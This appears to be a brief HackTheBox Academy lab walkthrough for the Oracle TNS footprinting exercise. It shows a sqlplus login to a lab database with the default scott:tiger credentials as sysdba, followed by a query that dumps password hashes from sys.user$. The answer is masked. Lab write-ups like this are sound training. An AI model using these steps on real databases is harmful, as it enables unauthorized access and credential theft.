Oracle TNS
ℹ️ Informations¶
- 🌐 Website: HackTheBox
- 📚 Module: Footprinting
- 🔗 Link: Oracle TNS
❓Question¶
Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.
📋 Walkthrough¶
Use provided credentials scott:tiger
and connect to Oracle using sqlplus
with sysdb
privileges.
sqlplus scott/tiger@10.129.205.19/XE as sysdba
SQL*Plus: Release 19.0.0.0.0 - Production on Sun Aug 25 10:59:05 2024
Version 19.6.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> select name, password from sys.user$;
Answer
***************